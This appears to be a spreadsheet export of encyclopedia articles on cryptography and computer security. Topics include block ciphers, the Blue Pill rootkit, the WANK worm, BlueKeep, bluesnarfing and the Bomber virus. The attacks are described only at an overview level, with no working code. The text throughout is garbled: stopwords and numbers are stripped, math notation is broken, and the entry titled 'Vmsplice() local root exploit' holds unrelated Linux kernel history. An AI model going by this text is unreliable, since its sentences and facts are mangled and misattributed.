{\displaystyle l_{i+1}=r_{i}\,} {\displaystyle r_{i+1}=l_{i}\oplus {\rm {f}}(r_{i},k_{i})} .then ciphertext {\displaystyle (r_{n+1},l_{n+1})} decryption ciphertext {\displaystyle (r_{n+1},l_{n+1})} accomplished computing {\displaystyle i=n,n-1,\ldots {\displaystyle r_{i}=l_{i+1}\,} {\displaystyle l_{i}=r_{i+1}\oplus {\rm {f}}(l_{i+1},k_{i})} .then {\displaystyle (l_{0},r_{0})} plaintext again. advantage feistel model compared substitution–permutation network round function {\displaystyle {\rm {f}}} invertible. lai–massey ciphers lai–massey scheme offers security properties similar feistel structure. also shares advantage round function {\displaystyle \mathrm invertible. another similarity also splits input block equal pieces. however, round function applied difference two, result added half blocks. {\displaystyle \mathrm round function {\displaystyle \mathrm half-round function {\displaystyle k_{0},k_{1},\ldots ,k_{n}} sub-keys rounds {\displaystyle 0,1,\ldots respectively. then basic operation follows: split plaintext block equal pieces, {\displaystyle l_{0}} {\displaystyle r_{0}} round {\displaystyle i=0,1,\dots compute {\displaystyle (l_{i+1}',r_{i+1}')=\mathrm (l_{i}'+t_{i},r_{i}'+t_{i}),} {\displaystyle t_{i}=\mathrm (l_{i}'-r_{i}',k_{i})} {\displaystyle (l_{0}',r_{0}')=\mathrm (l_{0},r_{0})} then ciphertext {\displaystyle (l_{n+1},r_{n+1})=(l_{n+1}',r_{n+1}')} decryption ciphertext {\displaystyle (l_{n+1},r_{n+1})} accomplished computing {\displaystyle i=n,n-1,\ldots {\displaystyle (l_{i}',r_{i}')=\mathrm ^{-1}(l_{i+1}'-t_{i},r_{i+1}'-t_{i})} {\displaystyle t_{i}=\mathrm (l_{i+1}'-r_{i+1}',k_{i})} {\displaystyle (l_{n+1}',r_{n+1}')=\mathrm ^{-1}(l_{n+1},r_{n+1})} then {\displaystyle (l_{0},r_{0})=(l_{0}',r_{0}')} plaintext again. operations (add–rotate–xor) many modern block ciphers hashes algorithms—their round function involves three operations: modular addition, rotation fixed rotation amounts, xor. examples include chacha20, speck, xxtea, blake. many authors draw network, kind data flow diagram, illustrate round function.these operations popular relatively fast cheap hardware software, implementation made extremely simple, also constant time, therefore immune timing attacks. rotational cryptanalysis technique attempts attack round functions. other operations other operations often used block ciphers include data-dependent rotations rc6, substitution implemented lookup table data encryption standard advanced encryption standard, permutation box, multiplication idea. modes operation block cipher allows encryption single data block cipher's block length. variable-length message, data must first partitioned separate cipher blocks. simplest case, known electronic codebook (ecb) mode, message first split separate blocks cipher's block size (possibly extending last block padding bits), block encrypted decrypted independently. however, naive method generally insecure equal plaintext blocks always generate equal ciphertext blocks (for key), patterns plaintext message become evident ciphertext output.to overcome limitation, several called block cipher modes operation designed specified national recommendations nist 800-38a tr-02102 international standards iso/iec 10116. general concept randomization plaintext data based additional input value, frequently called initialization vector, create termed probabilistic encryption. popular cipher block chaining (cbc) mode, encryption secure initialization vector passed along plaintext message must random pseudo-random value, added exclusive-or manner first plaintext block encrypted. resultant ciphertext block used initialization vector next plaintext block. cipher feedback (cfb) mode, emulates self-synchronizing stream cipher, initialization vector first encrypted added plaintext block. output feedback (ofb) mode repeatedly encrypts initialization vector create stream emulation synchronous stream cipher. newer counter (ctr) mode similarly creates stream, advantage needing unique (pseudo-)random values initialization vectors; needed randomness derived internally using initialization vector block counter encrypting counter block.from security-theoretic point view, modes operation must provide known semantic security. informally, means given ciphertext unknown cannot practically derive information ciphertext (other length message) would known without seeing ciphertext. shown modes discussed above, exception mode, provide property so-called chosen plaintext attacks. padding some modes mode operate complete plaintext blocks. simply extending last block message zero-bits insufficient since allow receiver easily distinguish messages differ amount padding bits. more importantly, simple solution gives rise efficient padding oracle attacks. suitable padding scheme therefore needed extend last plaintext block cipher's block size. while many popular schemes described standards literature shown vulnerable padding oracle attacks, solution adds one-bit extends last block zero-bits, standardized "padding method iso/iec 9797-1, proven secure attacks. cryptanalysis brute-force attacks this property results cipher's security degrading quadratically, needs taken account selecting block size. there trade-off though large block sizes result algorithm becoming inefficient operate. earlier block ciphers typically selected 64-bit block size, newer designs support block sizes bits more, ciphers supporting range different block sizes. differential cryptanalysis linear cryptanalysis linear cryptanalysis form cryptanalysis based finding affine approximations action cipher. linear cryptanalysis widely used attacks block ciphers; differential cryptanalysis.the discovery attributed mitsuru matsui, first applied technique feal cipher (matsui yamagishi, 1992). integral cryptanalysis integral cryptanalysis cryptanalytic attack particularly applicable block ciphers based substitution–permutation networks. unlike differential cryptanalysis, uses pairs chosen plaintexts fixed difference, integral cryptanalysis uses sets even multisets chosen plaintexts part held constant another part varies possibilities. example, attack might chosen plaintexts bits same, differ bits. such necessarily sums corresponding sets ciphertexts provide information cipher's operation. this contrast differences pairs texts sums larger sets texts inspired name "integral cryptanalysis", borrowing terminology calculus. other techniques addition linear differential cryptanalysis, growing catalog attacks: truncated differential cryptanalysis, partial differential cryptanalysis, integral cryptanalysis, encompasses square integral attacks, slide attacks, boomerang attacks, attack, impossible differential cryptanalysis algebraic attacks. block cipher design credibility, must demonstrate evidence security known attacks. provable security when block cipher used given mode operation, resulting algorithm ideally secure block cipher itself. (discussed above) emphatically lacks property: regardless secure underlying block cipher mode easily attacked. hand, mode proven secure assumption underlying block cipher likewise secure. note, however, making statements like requires formal mathematical definitions means encryption algorithm block cipher secure". this section describes common notions properties block cipher have. each corresponds mathematical model used prove properties higher level algorithms, cbc. this general approach cryptography proving higher-level algorithms (such cbc) secure explicitly stated assumptions regarding components (such block cipher) known provable security. standard model informally, block cipher secure standard model attacker cannot tell difference block cipher (equipped random key) random permutation. precise, n-bit block cipher. imagine following game: person running game flips coin. coin lands heads, chooses random defines function coin lands tails, chooses random permutation n-bit strings, defines function attacker chooses n-bit string person running game tells value f(x). step repeated total times. (each interactions query.) attacker guesses coin landed. wins guess correct.the attacker, model algorithm, called adversary. function (which adversary able query) called oracle. note adversary trivially ensure chance winning simply guessing random even example, always guessing "heads"). therefore, pe(a) denote probability adversary wins game define advantage 2(pe(a) 1/2). follows guesses randomly, advantage hand, always wins, advantage block cipher pseudo-random permutation (prp) adversary advantage significantly greater given specified restrictions adversary's running time. step adversaries option learning f−1(x) instead f(x) (but still small advantages) strong (sprp). adversary non-adaptive chooses values game begins (that information gleaned previous queries choose goes). these definitions proven useful analyzing various modes operation. example, define similar game measuring security block cipher-based encryption algorithm, show (through reduction argument) probability adversary winning game much pe(a) (the reduction typically provides limits running time equivalently, pe(a) small relevant attacker significant probability winning game. this formalizes idea higher-level algorithm inherits block cipher's security. ideal cipher model practical evaluation block ciphers evaluated according multiple criteria practice. common factors include: parameters, size block size, provide upper bound security cipher. estimated security level, based confidence gained block cipher design largely withstood major efforts cryptanalysis time, design's mathematical soundness, existence practical certificational attacks. cipher's complexity suitability implementation hardware software. hardware implementations measure complexity terms gate count energy consumption, important parameters resource-constrained devices. cipher's performance terms processing throughput various platforms, including memory requirements. cost cipher, refers licensing requirements apply intellectual property rights. flexibility cipher, includes ability support multiple sizes block lengths. notable block ciphers lucifer lucifer generally considered first civilian block cipher, developed 1970s based work done horst feistel. revised version algorithm adopted u.s. government federal information processing standard: fips data encryption standard (des). chosen u.s. national bureau standards (nbs) public invitation submissions internal changes (and, potentially, nsa). publicly released 1976 widely used.des designed among things, resist certain cryptanalytic attack known rediscovered ibm, though unknown publicly rediscovered published biham shamir late 1980s. technique called differential cryptanalysis remains general attacks block ciphers; linear cryptanalysis another, unknown even nsa, prior publication mitsuru matsui. prompted large amount work publications cryptography cryptanalysis open community inspired many cipher designs.des block size bits size bits. 64-bit blocks became common block cipher designs des. length depended several factors, including government regulation. many observers 1970s commented 56-bit length used short. time went inadequacy became apparent, especially special purpose machine designed break demonstrated 1998 electronic frontier foundation. extension des, triple des, triple-encrypts block either independent keys (112-bit 80-bit security) three independent keys (168-bit 112-bit security). widely adopted replacement. 2011, three-key version still considered secure, though national institute standards technology (nist) standards longer permit two-key version applications, 80-bit security level. idea international data encryption algorithm (idea) block cipher designed james massey zurich xuejia lai; first described 1991, intended replacement des. idea operates 64-bit blocks using 128-bit key, consists series eight identical transformations round) output transformation (the half-round). processes encryption decryption similar. idea derives much security interleaving operations different groups modular addition multiplication, bitwise exclusive (xor) algebraically "incompatible" sense. designers analysed idea measure strength differential cryptanalysis concluded immune certain assumptions. successful linear algebraic weaknesses reported. 2012, best attack applies keys break full 8.5-round idea using narrow-bicliques attack four times faster brute force. block cipher designed ronald rivest 1994 which, unlike many ciphers, variable block size (32, bits), size 2040 bits) number rounds 255). original suggested choice parameters block size bits, 128-bit rounds. feature data-dependent rotations; goals prompt study evaluation operations cryptographic primitive. also consists number modular additions xors. general structure algorithm feistel-like network. encryption decryption routines specified lines code. schedule, however, complex, expanding using essentially one-way function binary expansions golden ratio sources "nothing sleeve numbers". tantalising simplicity algorithm together novelty data-dependent rotations made attractive object study cryptanalysts. 12-round (with 64-bit blocks) susceptible differential attack using chosen plaintexts. 18–20 rounds suggested sufficient protection. rijndael rijndael cipher developed belgian cryptographers, joan daemen vincent rijmen competing designs replace des. 5-year public competition become aes, (advanced encryption standard). adopted nist 2001, fixed block size bits size 128, 192, bits, whereas rijndael specified block sizes multiple bits, minimum bits. blocksize maximum bits, keysize theoretical maximum. operates column-major order matrix bytes, termed state (versions rijndael larger block size additional columns state). blowfish blowfish block cipher, designed 1993 bruce schneier included large number cipher suites encryption products. blowfish 64-bit block size variable length bits. 16-round feistel cipher uses large key-dependent s-boxes. notable features design include key-dependent s-boxes highly complex schedule. designed general-purpose algorithm, intended alternative ageing free problems constraints associated algorithms. time blowfish released, many designs proprietary, encumbered patents commercial/government secrets. schneier stated that, "blowfish unpatented, remain countries. algorithm hereby placed public domain, freely used anyone." applies twofish, successor algorithm schneier. generalizations tweakable block ciphers liskov, rivest, wagner described generalized version block ciphers called "tweakable" block ciphers. tweakable block cipher accepts second input called tweak along usual plaintext ciphertext input. tweak, along key, selects permutation computed cipher. changing tweaks sufficiently lightweight (compared usually fairly expensive setup operation), interesting operation modes become possible. disk encryption theory article describes modes. format-preserving encryption block ciphers traditionally work binary alphabet. that input output binary strings, consisting zeroes ones. situations, however, wish block cipher works alphabet; example, encrypting 16-digit credit card numbers ciphertext also 16-digit number might facilitate adding encryption layer legacy software. this example format-preserving encryption. more generally, format-preserving encryption requires keyed permutation finite language. this makes format-preserving encryption schemes natural generalization (tweakable) block ciphers. contrast, traditional encryption schemes, cbc, permutations plaintext encrypt multiple different ciphertexts, even using fixed key. relation cryptographic primitives block ciphers used build cryptographic primitives, below. primitives cryptographically secure, care taken build right way. stream ciphers built using block ciphers. ofb-mode mode block modes turn block cipher stream cipher. cryptographic hash functions built using block ciphers. one-way compression function descriptions several methods. methods resemble block cipher modes operation usually used encryption. cryptographically secure pseudorandom number generators (csprngs) built using block ciphers. secure pseudorandom permutations arbitrarily sized finite sets constructed block ciphers; format-preserving encryption. publicly known unpredictable permutation combined whitening enough construct block cipher single-key even-mansour cipher, perhaps simplest possible provably secure block cipher. message authentication codes (macs) often built block ciphers. cbc-mac, omac pmac macs. authenticated encryption also built block ciphers. means encrypt time. that provide confidentiality authentication. ccm, eax, authenticated encryption modes.just block ciphers used build hash functions, like sha-1 sha-2 based block ciphers also used independently shacal, hash functions used build block ciphers. examples block ciphers bear lion. also cipher security summary topics cryptography cipher references further reading knudsen, lars robshaw, matthew (2011). block cipher companion. springer. isbn 9783642173417. external links list many symmetric algorithms, majority block ciphers. block cipher lounge what block cipher? block cipher based gold sequences chaotic logistic tent system</t>
  </si>
  <si>
    <t>Block size (cryptography)</t>
  </si>
  <si>
    <t>modern cryptography, symmetric ciphers generally divided stream ciphers block ciphers. block ciphers operate fixed length string bits. length string block size. both input (plaintext) output (ciphertext) length; output cannot shorter input follows logically pigeonhole principle fact cipher must reversible undesirable output longer input. until announcement nist's contest, majority block ciphers followed example using block size bits bytes). however birthday paradox tells accumulating number blocks equal square root total number possible, approximately chance same, would start leak information message contents. thus even used proper encryption mode (e.g. ofb), data safely sent key. practice greater margin security desired, restricting single encryption much less data hundred megabytes. once seemed like fair amount data, today easily exceeded. cipher mode properly randomise input, limit even lower. consequently, candidates required support block length bits bytes). this acceptable exabytes data, suffice quite years come. winner contest, rijndael, supports block sizes 128, 192, bits, block size always bits. extra block sizes adopted standard. many block ciphers, rc5, support variable block size. luby-rackoff construction outerbridge construction increase effective block size cipher. joan daemen's 3-way baseking unusual block sizes bits, respectively. also ciphertext stealing format-preserving encryption</t>
  </si>
  <si>
    <t>Blue Pill (software)</t>
  </si>
  <si>
    <t>blue pill codename rootkit based virtualization. blue pill originally required amd-v (pacifica) virtualization support, later ported support intel vt-x (vanderpool) well. designed joanna rutkowska originally demonstrated black briefings august 2006, reference implementation microsoft windows vista kernel. name reference pill blue pill concept 1999 film matrix. overview blue pill concept trap running instance operating system starting thin hypervisor virtualizing rest machine previous operating system would still maintain existing references devices files, nearly anything, including hardware interrupts, requests data even system time could intercepted (and fake response sent) hypervisor. original concept blue pill published another researcher ieee oakland 2006, name vmbr (virtual-machine based rootkit).rutkowska claims that, since detection program could fooled hypervisor, system could "100% undetectable". since virtualization seamless design, virtualized guest supposed able query whether guest not. therefore, blue pill could detected virtualization implementation functioning specified.this assessment, repeated numerous press articles, disputed: issued statement dismissing claim full undetectability. some security researchers journalists also dismissed concept implausible. virtualization could detected timing attack relying external sources time.in 2007, group researchers challenged rutkowska blue pill rootkit detector software year's black conference, deal deemed no-go following rutkowska's request $384,000 funding prerequisite entering competition. rutkowska alexander tereshkin countered detractors' claims subsequent black speech, arguing proposed detection methods inaccurate.the source code blue pill since made public, following license: unauthorized (including publishing distribution) software requires valid license copyright holder. this software provided educational black training conference. pill pill technique detect presence virtual machine also developed joanna rutkowska. references external links introducing blue pill joanna rutkowska internetnews blackhat takes vista task heading hackers business week, august 2006 coach greg adams blue pill, episode security podcast black 2006 presentation 2008 source code detecting blocking blue pill, vitriol</t>
  </si>
  <si>
    <t>WANK (computer worm)</t>
  </si>
  <si>
    <t>wank worm computer worm attacked computers 1989 decnet. written digital command language. origin worm believed created melbourne-based hackers, first created australian australians. australian federal police thought worm created hackers used names electron phoenix. julian assange involved, never proven. political message wank worm distinct political message attached, first major worm political message. wank context stands worms against nuclear killers. following message appeared infected computer's screen: worm coincidentally appeared decnet network operated nasa days launch nasa space shuttle carrying galileo spacecraft. time, protests anti-nuclear groups regarding plutonium-based power modules galileo. protesters contended shuttle blew challenger three years earlier 1986, plutonium spilled would cause widespread death residents florida.the worm propagated network pseudo-randomly system using algorithm converted victim machine's system time candidate target node address (composed decnet area node number) subsequently attempted exploit weakly secured accounts system decnet password identical usernames. worm attack computers within decnet area zealand. comment inside worm source code point branch logic indicated zealand nuclear-free zone. zealand recently forbidden u.s. nuclear-powered vessels docking harbours, thus fueling speculation inside nasa worm attack related anti-nuclear protest. line "you talk times peace all, prepare war" drawn lyrics midnight song "blossom blood". midnight australian rock band known political activism opposition nuclear power nuclear weapons. process name second version worm detected "oilz", australian shorthand term band. playful nature decnet networks affected included operated nasa space physics analysis network (span), department energy's high energy physics network (hepnet), cern, riken. separation networks prearranged division network addresses (decnet "areas"). thus, worm, picking random target address, could affect infected networks equally. worm code included common usernames hard-coded source code. addition political message, worm contained several features apparently playful nature. words "wank" "wanked" slang terms used many countries refer masturbation. addition, worm contained "over sixty" randomizable messages would display users, including "vote anarchist" "the watching you". worm also programmed trick users believing files deleted displaying file deletion dialogue could aborted, though files actually erased worm. anti-wank wank_shot kevin oberman (from doe) john mcmahon (from nasa) wrote separate versions anti-wank procedure deployed respective networks. exploited fact infecting system, wank would check netw_(random number), copy own, process table. found, worm would destroy itself. when anti-wank non-infected system, would create process named netw_(random number) there. anti-wank worked earlier version worm, though, process name worm later version changed oilz.a second version wank released october unlike previous version wank, version designed actually damage computers infected, rather falsely claim would alter passwords infected computers. like previous version wank, program would utilise rightslist database find computers infect. program wank_shot designed bernard perrow institut physique nucléaire d'orsay, rename rightlist replace dummy database. this would cause wank dummy, could designed hidden logic bomb. wank_shot provided system administrators affected networks installed onto computers. still took weeks worm completely erased network. also father christmas (computer worm) references external links oberman, kevin. "cert advisory ca-1989-04 wank worm span network" (pdf). carnegie mellon university software engineering institute. archived original 2000-12-18. retrieved september 2019. advisory virus test center, university hamburg, germany dreyfus, suelette; assange, julian (june 1997). underground. random house australia. isbn 1863305955. norman, james (2003-05-25). "hack future". age. "juvenile delinquents international saboteurs?" presented suelette dreyfus internet crime conference held melbourne, 16–17 february 1998, australian institute criminology darby, tom; schmidt, charles. "the history worm like programs". morris internet worm. archived original 2002-05-10. retrieved september 2019. "hacktivism politically motivated computer crime" written digital equipment corporation investigators; disputes wank worm political motivation rather play british meaning word "wank"</t>
  </si>
  <si>
    <t>Blue screen of death</t>
  </si>
  <si>
    <t>BlueKeep</t>
  </si>
  <si>
    <t>bluekeep (cve-2019-0708) security vulnerability discovered microsoft's remote desktop protocol (rdp) implementation, allows possibility remote code execution. first reported 2019, present unpatched windows nt-based versions microsoft windows windows 2000 windows server 2008 windows microsoft issued security patch (including out-of-band update several versions windows reached end-of-life, windows 2019. august 2019, related bluekeep security vulnerabilities, collectively named dejablue, reported affect newer windows versions, including windows recent versions windows operating system, well older windows versions. september 2019, metasploit exploit wormable bluekeep security vulnerability announced released public realm. history bluekeep security vulnerability first noted national cyber security centre and, 2019, reported microsoft. vulnerability named bluekeep computer security expert kevin beaumont twitter. bluekeep officially tracked cve-2019-0708 "wormable" remote code execution vulnerability.both u.s. national security agency (which issued advisory vulnerability june 2019) microsoft stated vulnerability could potentially used self-propagating worms, microsoft (based security researcher's estimation nearly million devices vulnerable) saying theoretical attack could similar scale eternalblue-based attacks notpetya wannacry.on advisory, researchers cert coordination center disclosed separate rdp-related security issue windows 2019 update windows server 2019, citing behaviour network level authentication (nla) login credentials cached client system, user re-gain access connection automatically network connection interrupted. microsoft dismissed vulnerability intended behaviour, disabled group policy.as june 2019, active malware vulnerability seemed publicly known; however, undisclosed proof concept (poc) codes exploiting vulnerability available. july 2019, sophos, british security company, reported working example poc, order emphasize urgent need patch vulnerability. july 2019, details exploit purportedly revealed conference speaker chinese security firm. july 2019, computer experts reported commercial version exploit available. july 2019, computer experts reported significant increase malicious activity warned, based histories exploits similar vulnerabilities, active exploit bluekeep vulnerability wild might imminent.on august 2019, related bluekeep security vulnerabilities, collectively named dejablue, reported affect newer windows versions, including windows recent versions operating system windows well older windows versions.on september 2019, exploit wormable bluekeep security vulnerability announced released public realm. initial version exploit was, however, unreliable, known cause "blue screen death" (bsod) errors. later announced, removing cause bsod error.on november 2019, first bluekeep hacking campaign mass scale reported, included unsuccessful cryptojacking mission.on november 2019, microsoft confirmed bluekeep attack, urged users immediately patch windows systems. mechanism protocol uses "virtual channels", configured authentication, data path client server providing extensions. defines "static" virtual channels, "dynamic" virtual channels contained within static channels. server binds virtual channel "ms_t120" channel legitimate reason client connect static channel heap corruption occurs allows arbitrary code execution system level.windows windows vista, windows windows server 2003, windows server 2008, windows server 2008 named microsoft vulnerable attack. versions newer windows windows affected. cybersecurity infrastructure security agency stated also successfully achieved code execution vulnerability windows 2000. mitigation microsoft released patches vulnerability 2019, windows windows vista, windows windows server 2003, windows server 2008, windows server 2008 this included versions windows reached end-of-life (such vista, server 2003) thus longer eligible security updates. patch forces aforementioned "ms_t120" channel always bound even requested otherwise server.the recommended additional measures, disabling remote desktop services associated port (tcp 3389) used, requiring network level authentication (nla) rdp. according computer security company sophos, two-factor authentication make issue less vulnerability. however, best protection take internet: switch needed and, needed, make accessible vpn. also references external links bluekeep: windows update patches here, here here (microsoft). proof-of-concept flaw sophos technical discussion flaw youtube</t>
  </si>
  <si>
    <t>Bluebugging</t>
  </si>
  <si>
    <t>bluebugging form bluetooth attack often caused lack awareness. developed onset bluejacking bluesnarfing. similar bluesnarfing, bluebugging accesses uses phone features limited transmitting power class bluetooth radios, normally capping range 10–15 meters. however, operational range increased directional antenna. history bluebugging developed german researcher martin herfurt 2004, year advent bluejacking. initially threat laptops bluetooth capability, later targeted mobile phones pdas. bluebugging manipulates target phone compromising security, create backdoor attack returning control phone owner. once control phone established, used call back hacker able listen conversations, hence name "bugging". bluebug program also capability create call forwarding application whereby hacker receives calls intended target phone.a development bluebugging allowed control target phones bluetooth phone headsets, achieves pretending headset thereby "tricking" phone obeying call commands. hacker receive calls intended target phone, send messages, read phonebooks, examine calendars. also ieee 802.15 near-field communication personal area network references external links bluetooth special interest group site (includes specifications) official bluetooth site aimed users bluetooth/ethernet vendor address lookup bluebugging video description</t>
  </si>
  <si>
    <t>Bluesnarfing</t>
  </si>
  <si>
    <t>bluesnarfing unauthorized access information wireless device bluetooth connection, often phones, desktops, laptops, pdas (personal digital assistant). this allows access calendars, contact lists, emails text messages, phones, users copy pictures private videos. both bluesnarfing bluejacking exploit others' bluetooth connections without knowledge. while bluejacking essentially harmless transmits data target device, bluesnarfing theft information target device. description current mobile software generally must allow connection using temporary state initiated user order 'paired' another device copy content. there seem been, past, available reports phones bluesnarfed without pairing explicitly allowed. after disclosure vulnerability, vendors mobile phone patched bluetooth implementations and, time writing, current phone models known vulnerable attack. device bluetooth connection turned "discoverable" (able found bluetooth devices range) susceptible bluejacking possibly bluesnarfing vulnerability vendor's software. turning feature, potential victim safer possibility bluesnarfed; although device "hidden" bluesnarfable guessing device's address brute force attack. brute force attacks, main obstacle approach sheer number possible addresses. bluetooth uses 48-bit unique address, first bits common manufacturer. remaining bits approximately 16.8 million possible combinations, requiring average million attempts guess brute force. prevalence attacks wireless systems increased along popularity wireless networks. attackers often search rogue access points, unauthorized wireless devices installed organization's network allow attacker circumvent network security. rogue access points unsecured wireless networks often detected driving, using automobile means transportation search wireless signal large area. bluesnarfing attack access information wireless devices transmit using bluetooth protocol. with mobile devices, type attack often used target international mobile equipment identity (imei). access unique piece data enables attackers divert incoming calls messages another device without user's knowledge. response bluetooth vendors advise customers vulnerable bluetooth devices either turn areas regarded unsafe undiscoverable. this bluetooth setting allows users keep bluetooth compatible bluetooth products used bluetooth devices cannot discover them. because bluesnarfing invasion privacy, illegal many countries. bluesniping bluesniping emerged specific form bluesnarfing effective longer ranges normally possible. according wired magazine, method surfaced black briefings hacker conferences 2004 shown g4techtv show screen savers. example, "rifle" directional antenna, linux-powered embedded bluetooth module mounted ruger 10/22 folding stock used long-range bluesnarfing. popular culture series person interest, bluesnarfing, often mistakenly referred bluejacking show times forced pairing phone cloning, common element show used track people main characters trying save stop. bluejacking bluebugging slurping snarfing references mark ciampa (2009), security+ guide network security fundamentals third edition. printed canada. roberto martelloni's home page linux source code released bluesnarfer proof-of-concept.</t>
  </si>
  <si>
    <t>Volatility (software)</t>
  </si>
  <si>
    <t>volatility open-source memory forensics framework incident response malware analysis. written python supports microsoft windows, linux version 2.5). volatility created aaron walters, drawing academic research memory forensics. operating system support volatility supports investigations following memory images:windows: 32-bit windows (service pack 32-bit windows 2003 server (service pack 32-bit windows vista (service pack 32-bit windows 2008 server (service pack 32-bit windows (service pack 32-bit windows 8.1, update 32-bit windows (initial support) 64-bit windows (service pack 64-bit windows 2003 server (service pack 64-bit windows vista (service pack 64-bit windows 2008 server (service pack 64-bit windows 2008 server (service pack 64-bit windows (service pack 64-bit windows 8.1, update 64-bit windows server 2012 2012 64-bit windows (including least 10.0.14393) 64-bit windows server 2016 (including least 10.0.14393.0)mac osx: 32-bit 10.5.x leopard (the 64-bit 10.5 server, supported) 32-bit 10.6.x snow leopard 32-bit 10.7.x lion 64-bit 10.6.x snow leopard 64-bit 10.7.x lion 64-bit 10.8.x mountain lion 64-bit 10.9.x mavericks 64-bit 10.10.x yosemite 64-bit 10.11.x capitan 64-bit 10.12.x sierra 64-bit 10.13.x high sierra 64-bit 10.14.x mojave 64-bit 10.15.x catalinalinux: 32-bit linux kernels 2.6.11 64-bit linux kernels 2.6.11 opensuse, ubuntu, debian, centos, fedora, mandriva, etc. memory format support volatility supports variety sample file formats ability convert formats: raw/padded physical memory firewire (ieee 1394) expert witness (ewf) 64-bit windows crash dump 64-bit windows hibernation (from windows earlier) 64-bit mach-o files virtualbox core dumps vmware saved state (.vmss) snapshot (.vmsn) hpak format (fastdump) qemu memory dumps lime format references</t>
  </si>
  <si>
    <t>Bolgimo</t>
  </si>
  <si>
    <t>bolgimo win32 computer worm, self-replicating computer program similar computer virus, propagates attempting exploit unpatched windows computers vulnerable dcom interface buffer overrun vulnerability using port network. worm discovered november 2003 targets windows 2000 operating systems. target computer successfully infected, worm call user's attention fact machine vulnerable, download patch user's desktop patch installer. worm also attempts shut processes linked malware known exploit vulnerability, like msblaster. aliases worm.win32.bolgi (kaspersky) w32/bolgimo.worm (mcafee) w32.bogi.worm (symantec) worm/bolgi.a (avira) w32/bolgi-a (sophos) worm:win32/bolgimo.a (microsoft) references</t>
  </si>
  <si>
    <t>Bomb (icon)</t>
  </si>
  <si>
    <t>bomb icon several different applications computing, typically indicates fatal system error. computing bomb icon symbol designed susan kare displayed inside system error alert "classic" macintosh operating system crash system decided unrecoverable. since classic offered little memory protection, application crash would often take entire system. bomb symbol first appeared original macintosh 1984. often, reason crash, including error code, displayed dialog. cases, "resume" button would available, allowing user dismiss dialog force offending program quit, often resume button would disabled computer would restarted. originally, resume button unavailable unless running program provided code allow recovery. with advent system thought could handle recovery, normal error dialog displayed, application forced quit. this helped classic providing little protection heap corruption using guard pages; application crash application's heap corrupt, could thrown away. debugger program macsbug sometimes used even users provide basic (though always reliable) error recovery, could used troubleshooting purposes, much output unix kernel panic windows blue screen death could classic bomb boxes often ridiculed providing little useful information error; conscious decision macintosh team eliminate information user could make sense error code intended included report developer. system architecture vastly different classic application crash cannot usually bring entire system. kernel panic screen (either text overwritten screen older versions, simplified reboot message recent versions) replaces bomb symbol appears less often radically different system architecture. bomb symbol used test application called bomb.app, specifically written cause non-fatal crash, included xcode uses rendition bomb symbol icon. original system call display "bomb box" called dserror, "deep shit". this deemed obscene, became "system error manager". atari tos-based systems, atari used bombs indicate critical system error. number bombs displayed revealed information occurred error. error (also called exception) reported motorola 68000 microprocessor. first version used mushroom clouds. bomb: reset, initial bombs: error bombs: address error bombs: illegal instruction bombs: division zero bombs: instruction bombs: trapv instruction bombs: privilege violation bombs: trace bombs: line 1010 emulator bombs: line 1111 emulator 12–13 bombs: reserved bombs: format error bombs: uninitialized interrupt vector 16–23 bombs: reserved bombs: spurious interrupt bombs: level interrupt autovector bombs: level interrupt autovector bombs: level interrupt autovector bombs: level interrupt autovector bombs: level interrupt autovector bombs: level interrupt autovector bombs: level interrupt autovector 32–47 bombs: trap instruction vectors 48–63 bombs: reserved 64–255 bombs: user interrupt vectors unicode bomb emoji added miscellaneous symbols pictographs character block unicode version code point u+1f4a3 bomb. also grenade (insignia) screen death references external links about system error handler</t>
  </si>
  <si>
    <t>VoIP VPN</t>
  </si>
  <si>
    <t>voip combines voice virtual private network technologies offer method delivering secure voice. because voip transmits digitized voice stream data, voip solution accomplishes voice encryption quite simply, applying standard data-encryption mechanisms inherently available collection protocols used implement vpn. voip gateway-router first converts analog voice signal digital form, encapsulates digitized voice within packets, encrypts digitized voice using ipsec, finally routes encrypted voice packets securely tunnel. remote site, another voip router decodes voice converts digital voice analog signal delivery phone. voip also within tunnel using ssl-based openvpn. there encryption former case, traffic overhead significantly lower comparison ipsec tunnel. advantage openvpn tunneling dynamic provide bits encryption. advantages security reason pass voice virtual private network, however. session initiation protocol, commonly used voip protocol notoriously difficult pass firewall uses random port numbers establish connections. also workaround avoid firewall issue configuring remote voip clients. however, latest voip standard stun, turn eliminate natively problems voip. installing extension simple means obtain off-premises extension (opx), function conventional landline telephony required leased line private branch exchange remote site. worker remote location could therefore appear virtually company's main office, full internal access telephone network. disadvantages protocol overhead caused encapsulation voip protocol within ipsec dramatically increases bandwidth requirements voip calls, thus making voip protocols "fat" used mobile data connections like gprs, edge umts. although voip usable mobile environments, sometimes used create "encrypted voip trunk" different sites corporations, running voip interconnections connection. solutions recent publication voip encryption standards built protocol, zrtp srtp, allow voip client without overhead, integrating standard features voip without manage gateway pbx. free implementation voip solution accomplished free open source software using linux distribution operating system, voip server, ipsec server. references https://www.pcmag.com/article/365673/when-to-use-a-vpn-to-carry-voip-traffic sources</t>
  </si>
  <si>
    <t>Bomber (computer virus)</t>
  </si>
  <si>
    <t>bomber (also known commander bomber) polymorphic memory resident computer virus, known technique "patchy infection". this method infection similar utilised onehalf computer virus. contrary usual method infecting executables (which append virus body executable change entry point), inserts several fragments ("patches") code random places inside file. these fragments transfer control using various mechanisms. method infection makes detection virus difficult anti-virus programs, means would scan file entirety order detect virus. size bomber executable approximately 4096 bytes contains following text: commander bomber here [dame] [dame] external links www.f-secure.com</t>
  </si>
  <si>
    <t>Vmsplice() local root exploit</t>
  </si>
  <si>
    <t xml:space="preserve">linux kernel free open-source, monolithic, modular, multitasking, unix-like operating system kernel. originally authored 1991 linus torvalds i386-based soon adopted kernel operating system, written free (libre) replacement unix. linux provided general public license version only, contains files compatible licenses.since late 1990s, included part large number operating system distributions, many commonly also called linux. linux deployed wide variety computing systems, embedded devices, mobile devices (including android operating system), personal computers, servers, mainframes, supercomputers. tailored specific architectures several usage scenarios using family simple commands (that without need manually editing source code compilation); privileged users also fine-tune kernel parameters runtime. most linux kernel code written using extensions standard programming language architecture-specific instructions (isa) limited parts kernel. this produces highly optimized executable (vmlinux) respect utilization memory space task execution times.day-to-day development discussions take place linux kernel mailing list (lkml). changes tracked using version control system git, originally authored torvalds free software replacement bitkeeper. history april 1991, linus torvalds, time 21-year-old computer science student university helsinki, finland, started working simple ideas operating system inspired unix, personal computer. started task switcher intel 80386 assembly language terminal driver. august 1991, torvalds posted following comp.os.minix, newsgroup usenet: (free) operating system (just hobby, professional like gnu) 386(486) clones. this brewing since april, 